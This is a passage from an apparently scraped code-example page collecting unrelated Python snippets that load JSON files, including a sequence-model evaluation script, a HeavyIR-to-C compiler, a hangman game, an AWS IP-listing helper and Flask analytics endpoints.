      help='TFR pattern string appended to data_dir/tfrecords for subsetting [Default: %default]')
  parser.add_option('-v', dest='high_var_pct',
      default=1.0, type='float',
      help='Highly variable site proportion to take [Default: %default]')
  (options, args) = parser.parse_args()

  if len(args) != 3:
    parser.error('Must provide parameters, model, and test data HDF5')
  else:
    params_file = args[0]
    model_file = args[1]
    data_dir = args[2]

  if not os.path.isdir(options.out_dir):
    os.mkdir(options.out_dir)

  # parse shifts to integers
  options.shifts = [int(shift) for shift in options.shifts.split(',')]

  #######################################################
  # targets

  # read table
  if options.targets_file is None:
    options.targets_file = '%s/targets.txt' % data_dir
  targets_df = pd.read_csv(options.targets_file, index_col=0, sep='\t')
  num_targets = targets_df.shape[0]

  # classify
  target_classes = []
  for ti in range(num_targets):
    description = targets_df.iloc[ti].description
    if description.find(':') == -1:
      tc = '*'
    else:
      desc_split = description.split(':')
      if desc_split[0] == 'CHIP':
        tc = '/'.join(desc_split[:2])
      else:
        tc = desc_split[0]
    target_classes.append(tc)
  targets_df['class'] = target_classes
  target_classes = sorted(set(target_classes))
  print(target_classes)

  #######################################################
  # model

  # read parameters
  with open(params_file) as params_open:
    params = json.load(params_open)
  params_model = params['model']
  params_train = params['train']

  # construct eval data
  eval_data = dataset.SeqDataset(data_dir,
    split_label=options.split_label,
    batch_size=params_train['batch_size'],
    mode=tf.estimator.ModeKeys.EVAL,
    tfr_pattern=options.tfr_pattern)

  # initialize model
  seqnn_model = seqnn.SeqNN(params_model)
  seqnn_model.restore(model_file)
  seqnn_model.build_ensemble(options.rc, options.shifts)

  #######################################################
  # targets/predictions

  # option to read from disk?

  # predict
  eval_preds = seqnn_model.predict(eval_data, verbose=1).astype('float16')
  print('')
  
  # targets
  eval_targets = eval_data.numpy(return_inputs=False, return_outputs=True)

  # flatten
  eval_preds = np.reshape(eval_preds, (-1,num_targets))
  eval_targets = np.reshape(eval_targets, (-1,num_targets))

  #######################################################
  # process classes

  targets_spec = np.zeros(num_targets)

  for tc in target_classes:
    class_mask = np.array(targets_df['class'] == tc)
    num_targets_class = class_mask.sum()

    if num_targets_class == 1:
      targets_spec[class_mask] = np.nan
    else:
      # slice class
      eval_preds_class = eval_preds[:,class_mask].astype('float32')
      eval_targets_class = eval_targets[:,class_mask].astype('float32')

      # highly variable filter
      if options.high_var_pct < 1:
        eval_targets_var = eval_targets_class.var(axis=1)
        high_var_t = np.percentile(eval_targets_var, 100*(1-options.high_var_pct))
        high_var_mask = (eval_targets_var >= high_var_t)

        eval_preds_class = eval_preds_class[high_var_mask]
        eval_targets_class = eval_targets_class[high_var_mask]

      # quantile normalize
      eval_preds_norm = quantile_normalize(eval_preds_class)
      eval_targets_norm = quantile_normalize(eval_targets_class)

      # mean normalize
      eval_preds_norm = eval_preds_norm - eval_preds_norm.mean(axis=-1, keepdims=True)
      eval_targets_norm = eval_targets_norm - eval_targets_norm.mean(axis=-1, keepdims=True)

      # compute correlations
      pearsonr_class = np.zeros(num_targets_class)
      for ti in range(num_targets_class):
        pearsonr_class[ti] = pearsonr(eval_preds_norm[:,ti], eval_targets_norm[:,ti])[0]

      # save
      targets_spec[class_mask] = pearsonr_class

      # print
      print('%-15s  %4d  %.4f' % (tc, num_targets_class, pearsonr_class.mean()))

  # write target-level statistics
  targets_acc_df = pd.DataFrame({
      'index': targets_df.index,
      'pearsonr': targets_spec,
      'identifier': targets_df.identifier,
      'description': targets_df.description
      })
  targets_acc_df.to_csv('%s/acc.txt'%options.out_dir, sep='\t',
                        index=False, float_format='%.5f')
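
quantile_normalize here comes from the project's own utilities. As a generic illustration of the idea only (not the project's implementation), quantile normalization maps each column onto the mean sorted profile across columns:

import numpy as np

def quantile_normalize_sketch(x):
    # x: (sites, targets). Replace each value by the across-target mean of the
    # sorted columns at the same rank (ties handled crudely; illustrative only).
    ranks = x.argsort(axis=0).argsort(axis=0)
    mean_sorted = np.sort(x, axis=0).mean(axis=1)
    return mean_sorted[ranks]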
コード例 #51
0
# This module tests whether the user-related APIs work correctly
# NOTE: This test should not be run against a production server
# (it generates random users in the DB)
# TODO: Make the test usable against a production server
import json
import random
import string

# Load config file
with open('config.json', mode='r') as config_file:
    CONFIG = json.load(config_file)
HEADERS = {
    'Content-Type': 'application/json'
}
# Routes
USER_SIGNUP_ROUTE = CONFIG.get('routes', {}).get('user', {}).get('signup')
USER_LOGIN_ROUTE = CONFIG.get('routes', {}).get('user', {}).get('login')
USER_PUBLICITY_ROUTE = CONFIG.get('routes', {}).get('user', {}).get(
    'publicity')
USER_ACTIVITY_ROUTE = CONFIG.get('routes', {}).get('user', {}).get(
    'activity_list')
LINKS_MAIN_ROUTE = CONFIG.get('routes', {}).get('links', {}).get('main')
CATEGORIES_MAIN_ROUTE = CONFIG.get(
    'routes', {}).get('categories', {}).get('main')
LINKS_BY_CATEGORY_ROUTE = CONFIG.get(
    'routes', {}).get('links', {}).get('by_category')
LINKS_BY_SEARCH_ROUTE = CONFIG.get(
    'routes', {}).get('links', {}).get('by_pattern')
LINKS_UPDATE_CATEGORY = CONFIG.get(
    'routes', {}).get('links', {}).get('update_category')
LINKS_BY_USER_ID = CONFIG.get(
コード例 #52
0
            # Find the position in the sorted overlaps that splits the indexes
            # into overlap values below and above the threshold
            tidx = bisect.bisect(self._odata[idx][sort_idx], thresh)
            return self._odata[idx][sort_idx][-tidx:]
        #return self._odata[idx][sort_idx][-npts:]
        return sort_idx[-npts:]

    def intr_prms_from_idx(self, idx):
        return self._intr_info[idx]

tree = OverlapLookup(5762)

# If asked, retrieve bank overlap
if opts.use_overlap is not None:
    with open(opts.use_overlap) as fin:
        overlap_toc = json.load(fin)["types"]
    # Just get the first type...
    overlap_toc = overlap_toc[overlap_toc.keys()[0]]

    # FIXME:
    bpath = os.path.dirname(opts.use_overlap)
    overlap = {}
    for idx, info in enumerate(overlap_toc):
        print os.path.join(bpath, info["filename"])
        with open(os.path.join(bpath, info["filename"])) as ovrlpfile:
            contents = json.load(ovrlpfile)
            overlap[idx] = numpy.array(contents["overlap"])
            tree.add_overlap_row(idx, (info["mass1"], info["mass2"]), numpy.array(contents["overlap"]))

tree.query(0, 1)
# TODO: Map an input point onto the template bank intrinsic space
コード例 #53
0
tkey = {i0:0, i1:0, i2:0, i3:0, i4:0, i5:0, i6:0, i7:0, i8:0, i9:0, a:0, b:0, c:0, d:0, e:0, f:0, g:0, h:0, i:0, j:0, k:0, l:0, m:0, n:0, o:0, p:0, q:0, r:0, s:0, t:0, u:0, v:0, w:0, x:0, y:0, z:0, bk:0, sp:0, tb:0, esc:0, sh:0, enter:0, bq:0, min:0, plus:0, lbra:0, rbra:0, bckslsh:0, semi:0, quote:0, comma:0, period:0, slash:0, F11:0}
tkey_v = {i0:0, i1:0, i2:0, i3:0, i4:0, i5:0, i6:0, i7:0, i8:0, i9:0, a:0, b:0, c:0, d:0, e:0, f:0, g:0, h:0, i:0, j:0, k:0, l:0, m:0, n:0, o:0, p:0, q:0, r:0, s:0, t:0, u:0, v:0, w:0, x:0, y:0, z:0, bk:0, sp:0, tb:0, esc:0, sh:0, enter:0, bq:0, min:0, plus:0, lbra:0, rbra:0, bckslsh:0, semi:0, quote:0, comma:0, period:0, slash:0, F11:0}
nkey = {i0:0, i1:0, i2:0, i3:0, i4:0, i5:0, i6:0, i7:0, i8:0, i9:0, a:0, b:0, c:0, d:0, e:0, f:0, g:0, h:0, i:0, j:0, k:0, l:0, m:0, n:0, o:0, p:0, q:0, r:0, s:0, t:0, u:0, v:0, w:0, x:0, y:0, z:0, bk:0, sp:0, tb:0, esc:0, sh:0, enter:0, bq:0, min:0, plus:0, lbra:0, rbra:0, bckslsh:0, semi:0, quote:0, comma:0, period:0, slash:0, F11:0}

from Structure.Disarray_Classes import *
from Structure.Disarray_Modes import *

Unsorted_Images = []
for this in os.listdir():
    if this[-4:] == ".jpg" or this[-4:] == ".png":
        Unsorted_Images.append(this)

importables = {}  # NOTE: empty here, so the loading loop below is a no-op until keys are added
for this in importables:
    with open('Data/' + this + '.json', 'r') as file:
        importables[this].update(json.load(file))

mode_func_dict = {'Quit': Quit_func, 'Add_New': Add_New_func, 'Menu': pass_func2}

Toolbar_Assets_dict = {'Toolbar.png':[0, 0, 10], 'Question_Block.png':[15, 0, 10.1]}
Toolbar_Assets = []
for this in os.listdir('Toolbar/Toolbar_Assets/'):
    Toolbar_Asset = Image(this, 'Toolbar/Toolbar_Assets/', Toolbar_Assets_dict[this][0], Toolbar_Assets_dict[this][1]); Toolbar_Asset.Layer = Toolbar_Assets_dict[this][2]
    Toolbar_Assets.append(Toolbar_Asset)

Bgr = 0; Bgg = 0; Bgb = 0; mouse_visible = 1; mode = "Menu"; toolbar_show = 1; help_show = 1; New_Image = Image(None, '', 0, 0); Images = []; screenlist = [(0, 0), pg.FULLSCREEN]; screenlist_v = [(screen.get_width(), screen.get_height()), pg.RESIZABLE]
running = 1
while running:
    if not screenlist == screenlist_v: screen = pg.display.set_mode(*screenlist)
    screenlist_v = screenlist
    mouse_x, mouse_y = pg.mouse.get_pos()
コード例 #54
0
ファイル: ir2c.py プロジェクト: graingert/hvcc
    def compile(clazz, hv_ir_path, static_dir, output_dir, externs, copyright=None):
        """ Compiles a HeavyIR file into a C.
            Returns a tuple of compile time in seconds, a notification dictionary,
            and a HeavyIR object counter.
        """

        # keep track of the total compile time
        tick = time.time()

        # establish the jinja environment
        env = jinja2.Environment()
        env.filters["hvhash"] = ir2c.filter_hvhash
        env.filters["extern"] = ir2c.filter_extern
        env.loader = jinja2.FileSystemLoader(
            os.path.join(os.path.dirname(__file__), "templates"))

        # read the hv.ir.json file
        with open(hv_ir_path, "r") as f:
            ir = json.load(f)

        # generate the copyright
        copyright = copyright_manager.get_copyright_for_c(copyright)


        #
        # Parse the hv.ir data structure and generate C-language strings.
        #

        # generate set of header files to include
        include_set = set([x for o in ir["objects"].values() for x in ir2c.get_class(o["type"]).get_C_header_set()])

        # generate set of files to add to project
        file_set = set([x for o in ir["objects"].values() for x in ir2c.get_class(o["type"]).get_C_file_set()])
        file_set.update(ir2c.__BASE_FILE_SET)

        # generate object definition and initialisation list
        init_list = []
        free_list = []
        def_list = []
        decl_list = []
        for obj_id in ir["init"]["order"]:
            o = ir["objects"][obj_id]
            obj_class = ir2c.get_class(o["type"])
            init_list.extend(obj_class.get_C_init(o["type"], obj_id, o["args"]))
            def_list.extend(obj_class.get_C_def(o["type"], obj_id))
            free_list.extend(obj_class.get_C_free(o["type"], obj_id, o["args"]))

        impl_list = []
        for x in ir["control"]["sendMessage"]:
            obj_id = x["id"]
            o = ir["objects"][obj_id]
            obj_class = ir2c.get_class(o["type"])
            impl = obj_class.get_C_impl(
                o["type"],
                obj_id,
                x["onMessage"],
                ir2c.get_class,
                ir["objects"])
            impl_list.append("\n".join(PrettyfyC.prettyfy_list(impl)))
            decl_list.extend(obj_class.get_C_decl(o["type"], obj_id, o["args"]))

        # generate static table data initialisers
        table_data_list = []
        for k, v in ir["tables"].items():
            o = ir["objects"][v["id"]]
            obj_class = ir2c.get_class(o["type"])
            table_data_list.extend(obj_class.get_table_data_decl(
                o["type"],
                v["id"],
                o["args"]))

        # generate the list of functions to process
        process_list = []
        for x in ir["signal"]["processOrder"]:
            obj_id = x["id"]
            o = ir["objects"][obj_id]
            process_list.extend(ir2c.get_class(o["type"]).get_C_process(
                o["type"],
                x,
                ir["objects"][obj_id]["args"]))



        #
        # Load the C-language template files and use the parsed strings to fill them in.
        #

        # make the output directory if necessary
        if not os.path.exists(output_dir):
            os.makedirs(output_dir)

        # the project name to be used as a part of file and function names
        name = ir["name"]["escaped"]

        # ensure that send_receive dictionary is alphabetised by the receiver key
        send_receive = OrderedDict(sorted([(k,v) for k,v in ir["control"]["receivers"].items()], key=lambda x: x[0]))

        # write HeavyContext.h
        with open(os.path.join(output_dir, "Heavy_{0}.hpp".format(name)), "w") as f:
            f.write(env.get_template("Heavy_NAME.hpp").render(
                name=name,
                include_set=include_set,
                decl_list=decl_list,
                def_list=def_list,
                signal=ir["signal"],
                copyright=copyright,
                externs=externs))

        # write C++ implementation
        with open(os.path.join(output_dir, "Heavy_{0}.cpp".format(name)), "w") as f:
            f.write(env.get_template("Heavy_NAME.cpp").render(
                name=name,
                signal=ir["signal"],
                init_list=init_list,
                free_list=free_list,
                impl_list=impl_list,
                send_receive=send_receive,
                send_table=ir["tables"],
                process_list=process_list,
                table_data_list=table_data_list,
                copyright=copyright))

        # write the C API header, Heavy_NAME.h
        with open(os.path.join(output_dir, "Heavy_{0}.h".format(name)), "w") as f:
            f.write(env.get_template("Heavy_NAME.h").render(
                name=name,
                copyright=copyright,
                externs=externs))

        # copy static files to output directory
        for f in file_set:
            shutil.copy2(
                src=os.path.join(static_dir, f),
                dst=os.path.join(output_dir, f))

        # generate HeavyIR object counter
        ir_counter = Counter([obj["type"] for obj in ir["objects"].values()])

        return {
            "stage": "ir2c",
            "notifs": {
                "has_error": False,
                "exception": None,
                "errors": []
            },
            "in_dir": os.path.dirname(hv_ir_path),
            "in_file": os.path.basename(hv_ir_path),
            "out_dir": output_dir,
            "out_file": "",
            "compile_time": (time.time() - tick),
            "obj_counter": ir_counter
        }
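A hedged sketch of how the status dict returned above might be checked by a caller. The result value below is a hand-written stand-in that only mirrors the keys built in the code; the paths and object-type counts are illustrative, not real compiler output.

from collections import Counter

# Hand-written stand-in mirroring the keys of the dict returned by the ir2c stage.
result = {
    "stage": "ir2c",
    "notifs": {"has_error": False, "exception": None, "errors": []},
    "in_dir": "/tmp/ir",              # illustrative paths only
    "in_file": "heavy.ir.json",
    "out_dir": "/tmp/out",
    "out_file": "",
    "compile_time": 0.042,
    "obj_counter": Counter({"__add": 3, "__var": 2}),   # made-up object types
}

if result["notifs"]["has_error"]:
    for error in result["notifs"]["errors"]:
        print(error)
else:
    print("ir2c finished in {0:.3f}s".format(result["compile_time"]))
    print("HeavyIR object counts:", dict(result["obj_counter"]))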
Code Example #55
    def get(self):
        # return the contents of analytics.json stored under server_path
        path = os.path.join(server_path, "analytics.json")
        with open(path, "r") as fp:
            analytics = json.load(fp)
        return analytics
Code Example #56
import json
import random

# Note: hangman(count), called below to draw the gallows, is assumed to be
# defined elsewhere in the original script.
def main():
    with open('animal.json') as f:
        data = json.load(f)

    # animalList=['Tiger','Monkey','Bat','Donkey','Bear']
    name = random.choice(data)   # the animal the player has to guess
    count = 8                    # number of wrong guesses allowed
    print('###############################################')
    print('             WELCOME TO HANGMAN                ')
    print('###############################################')
    print('\n\n\n')
    print('Category : Animals')
    # map each distinct letter of the name to 0 (hidden) or 1 (guessed);
    # note that repeated letters collapse into a single dict key
    l = {}
    for i in name:
        l[i] = 0

    attempt = []     # wrong guesses made so far
    char = ' '
    flag = False     # did the current guess hit any letter?
    status = False   # has the whole word been revealed?
    for i in l:
        if (l[i] == 0):
            print('-', end='')
    print('')

    print('Enter character of animal')
    while (count > 0 and status == False):
        flag = False
        print('\nEnter character :', end='')
        char = input()
        for i in l:
            if (i.lower() == char.lower() and l[i] != 1):
                l[i] = 1
                flag = True

        if (flag == False):
            attempt.append(char)
            count = count - 1

        for i in l:
            if (l[i] == 0):
                print('-', end='')
            else:
                print(i, end='')

        print('\nMissed :')

        for i in attempt:
            print(i, ' ', end='')
        print()

        print('Chances remaining :', count)
        status = True
        for i in l:
            if (l[i] == 0):
                status = False

        hangman(count)

    if (status == True):
        print('You won!!!!!!!!!!!!!!!!')
    else:
        print('You ran out of chances !!\nAnimal was :')
        for i in l:
            print(i, end='')

    print()
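For this example to run, animal.json only needs to hold a flat JSON array of animal names, as the commented-out animalList above suggests. A minimal way to create such a file (the animal names are just an illustration):

import json

# Write an animal.json of the shape main() expects: a flat JSON list of
# animal names for random.choice() to pick from.
animals = ['Tiger', 'Monkey', 'Bat', 'Donkey', 'Bear']
with open('animal.json', 'w') as f:
    json.dump(animals, f)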
Code Example #57
def read_json(path):
    with open(path, 'r') as file:
        data = json.load(file)
    return data
Code Example #58
                    column_name = column_name[column_name.
                                              find(str(previous_key)) +
                                              len(str(previous_key)) + 1:]
                print(column_name)
                master_list.append(str(column_name))
                column_name = column_name[:column_name.rfind(str(index)) - 1]
                # print( "Count: {}, Previous Key: {}".format( count, previous_key ) )
                # return list_or_dict[index]
                print("Value found")

                # time.sleep(0.7)


with open("./resources/Reports/report.json", 'r') as json_report_file:

    json_report_dict = json.load(json_report_file)
    # # print( json.dumps(json_report_dict["info"], indent=4) )
    # json_report_dict_normalize = json_normalize( json_report_dict )

    # for column in json_report_dict_normalize.columns:
    #     print("\nName of Colums: ", column)
    # print( json_report_dict_normalize )

    # for key in json_report_dict.keys():

    nested_element = dict_or_list2(json_report_dict,
                                   json_report_dict,
                                   previous_key="")
    # print(nested_element)
    # print(nested_element, end = '')
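The example above is an excerpt: the indented block at the top is cut from the middle of dict_or_list2, whose full definition is not included. As a rough, hypothetical sketch of what such a recursive walker might do, here is a small stand-in that flattens nested dict/list keys into dotted column names; the real helper may behave differently.

def flatten_keys(node, prefix=""):
    """Hypothetical stand-in for dict_or_list2: collect dotted key paths
    from a nested dict/list structure."""
    if isinstance(node, dict):
        items = node.items()
    elif isinstance(node, list):
        items = enumerate(node)
    else:
        return [prefix]          # leaf value: the accumulated path is a column name
    paths = []
    for key, value in items:
        new_prefix = "{0}.{1}".format(prefix, key) if prefix else str(key)
        paths.extend(flatten_keys(value, new_prefix))
    return paths

# e.g. flatten_keys({"info": {"version": 1}, "targets": [{"id": 7}]})
# returns ['info.version', 'targets.0.id']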
Code Example #59
def collect_ips(file_name):
    # print_header(), print_line_item() and the get_*_ip_* lookup helpers used
    # below are assumed to be defined elsewhere in the script
    with open(file_name) as f:
        output_json = json.load(f)

    for entry in output_json:
        print_header(entry['title'])

        external_hostnames_key = 'external_hostnames'
        if external_hostnames_key in entry:
            external_hostnames = entry[external_hostnames_key]
            for hostname in external_hostnames:
                print_line_item(hostname, get_ip_for_hostname(hostname))

        ec2_instance_name_tags_key = 'ec2_instance_name_tags'
        if ec2_instance_name_tags_key in entry:
            ec2_name_tags = entry[ec2_instance_name_tags_key]
            for pair in ec2_name_tags:
                display_name = pair['display_name']
                aws_tag_name = pair['aws_tag_name']
                ip = get_instance_ip_by_name_tag(aws_tag_name)
                print_line_item(display_name, ip)

        ec2_elb_name_tags_key = 'ec2_elb_name_tags'
        if ec2_elb_name_tags_key in entry:
            ec2_elb_name_tags = entry[ec2_elb_name_tags_key]
            for pair in ec2_elb_name_tags:
                display_name = pair['display_name']
                elb_name = pair['elb_name']
                ip = get_elb_ip_by_elb_name(elb_name)
                print_line_item(display_name, ip)

        elasticache_clusters_key = 'elasticache_clusters'
        if elasticache_clusters_key in entry:
            elasticache_clusters = entry[elasticache_clusters_key]
            for cluster in elasticache_clusters:
                display_name = cluster['display_name']
                cluster_id = cluster['cluster_id']
                print_line_item(display_name,
                                get_elasticache_ip_by_cluster_id(cluster_id))

        rds_instances_key = 'rds_instances'
        if rds_instances_key in entry:
            rds_instances = entry[rds_instances_key]
            for instance in rds_instances:
                display_name = instance['display_name']
                instance_id = None
                if 'instance_id' in instance:
                    instance_id = instance['instance_id']
                    print_line_item(display_name,
                                    get_rds_ip_by_instance_id(instance_id))
                elif 'cluster_id' in instance:
                    cluster_id = instance['cluster_id']
                    instance_id = get_writer_instance_id_by_cluster_id(
                        cluster_id)
                    print_line_item(display_name,
                                    get_rds_ip_by_instance_id(instance_id))
                else:
                    raise ValueError(
                        'Cannot locate RDS instance without instance_id or cluster_id'
                    )

        static_entries_key = 'static_entries'
        if static_entries_key in entry:
            static_entries = entry[static_entries_key]
            for item in static_entries:
                display_name = item['display_name']
                display_value = item['display_value']
                print_line_item(display_name, display_value)
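For reference, a guess at the shape of the JSON file collect_ips() expects, reconstructed purely from the keys the function reads; every name and value below is made up.

import json

# Each top-level entry is a section; all of the per-service lists are optional
# because collect_ips() checks for each key before using it.
sample_entries = [
    {
        "title": "Production environment",
        "external_hostnames": ["api.example.com"],
        "ec2_instance_name_tags": [
            {"display_name": "web server", "aws_tag_name": "prod-web-1"},
        ],
        "ec2_elb_name_tags": [
            {"display_name": "public ELB", "elb_name": "prod-elb"},
        ],
        "elasticache_clusters": [
            {"display_name": "cache", "cluster_id": "prod-cache-001"},
        ],
        "rds_instances": [
            {"display_name": "database", "instance_id": "prod-db-1"},
        ],
        "static_entries": [
            {"display_name": "VPN endpoint", "display_value": "10.0.0.1"},
        ],
    },
]

with open("inventory.json", "w") as f:   # "inventory.json" is a made-up file name
    json.dump(sample_entries, f, indent=2)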
Code Example #60
    def post(self):
        try:
            parser = reqparse.RequestParser()
            parser.add_argument('analytic_name',
                                type=str,
                                location="json",
                                required=True)
            parser.add_argument('method',
                                type=str,
                                location="json",
                                required=True)
            parser.add_argument('request_id',
                                type=str,
                                location="json",
                                required=True)
            args = parser.parse_args()
            path = server_path + "/" + args.get(
                "request_id") + "/" + "preprocess"
            files = os.listdir(path)
            df = pandas.read_csv(os.path.join(path, files[0]))
            module_name = "analytics." + args.get('analytic_name')
            module = importlib.import_module(module_name)
            analytic_class = getattr(module, args.get("analytic_name"))
            if args.get("method") == "train":
                result = analytic_class.train(df)
                if result["status"] == "success":

                    path = server_path + "/" + args.get(
                        "request_id") + "/" + args.get("analytic_name")
                    if not os.path.exists(path):
                        os.mkdir(path)
                    file_name = os.path.join(path, "model.json")
                    with open(file_name, "w") as fp:
                        json.dump(result, fp)
                return result

            elif args.get("method") == "score":
                path = server_path + "/" + args.get(
                    "request_id") + "/" + args.get("analytic_name")
                model_file = os.path.join(path, "model.json")
                with open(model_file, "r") as fp:
                    dct_model = json.load(fp)
                result, df_out, error = analytic_class.score(
                    df, dct_model["coeff"])
                if result == "success":

                    if not os.path.exists(path):
                        os.mkdir(path)
                    file_name = os.path.join(path, "output.csv")
                    df_out.to_csv(file_name, index=False)
                    return {"status": "success"}
                else:
                    return {"status": "failed", "error": error}
        except Exception as e:
            return {"status": "failed", "error": str(e)}